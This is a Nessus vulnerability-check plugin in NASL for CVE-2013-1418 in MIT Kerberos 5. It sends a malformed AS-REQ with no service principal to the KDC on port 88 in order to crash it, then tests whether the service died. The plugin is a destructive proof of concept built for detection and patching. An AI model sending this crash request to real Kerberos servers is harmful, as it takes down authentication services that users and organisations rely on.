The Kerberos service running on the remote host is affected by a remote denial of service (DoS) vulnerability. Attackers can exploit this issue to crash the affected KDC service, resulting in DoS conditions.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(70941);
script_version("1.5");
script_cvs_date("Date: 2018/07/14 1:59:35");
script_cve_id("CVE-2013-1418");
script_bugtraq_id(63555);
script_name(english:"MIT Kerberos 5 setup_server_realm() Remote DoS");
script_summary(english:"Tries to crash krb5kdc");
script_set_attribute(
attribute:"synopsis",
value:
"A single sign-on service is affected by a denial of service
vulnerability."
);
script_set_attribute(
attribute:"description",
value:
"The Kerberos service running on the remote host is affected by a remote
denial of service (DoS) vulnerability. Attackers can exploit this issue
to crash the affected KDC service, resulting in DoS conditions."
);
script_set_attribute(attribute:"see_also", value:"http://krbdev.mit.edu/rt/Ticket/Display.html?id=7757");
script_set_attribute(attribute:"solution", value:"Update the affected krb5 package.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"patch_publication_date", value:"2013/11/05");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/11/18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:mit:kerberos:5");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");
script_family(english:"General");
script_dependencies("find_service.nasl");
script_require_ports("Services/krbtgt", 88);
exit(0);
}
include("audit.inc");
include("kerberos_func.inc");
include("global_settings.inc");
include("misc_func.inc");
# Kerberos is detected by find_service.nasl; but seems only for MIT Kerberos
port = get_service(svc:'krbtgt', default:88, exit_on_fail: TRUE);
if (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);
soc = open_sock_tcp(port);
if (!soc) audit(AUDIT_SOCK_FAIL, port, 'TCP');
padata = NULL;
realm = 'REALM_' + SCRIPT_NAME;
principal = 'principal_' + SCRIPT_NAME;
# AS-REQ without service principal specified
req_body = der_encode_kdc_req_body (principal:principal, realm:realm, service:NULL);
encoded = der_encode_kdcreq (pvno:5, msg_type:0x0A, list:padata, req_body:req_body);
req = der_encode (tag:0x6A, data:encoded);
# Attempt to crash the KDC
req = raw_dword(d:strlen(req) & 0x7fffffff, be: TRUE) + req;
send(socket:soc, data: req);
close(soc);
# Wait a bit
sleep(1);
# Vulnerable KDC should be dead by now
ret = service_is_dead(port:port);
if (ret == 0 ) audit(AUDIT_LISTEN_NOT_VULN, 'KDC', port);
else if (ret == 1 ) security_warning(port:port);
else if (ret == -1) exit(0, 'An attempt to connect to remote TCP port ' + port +' timed out.');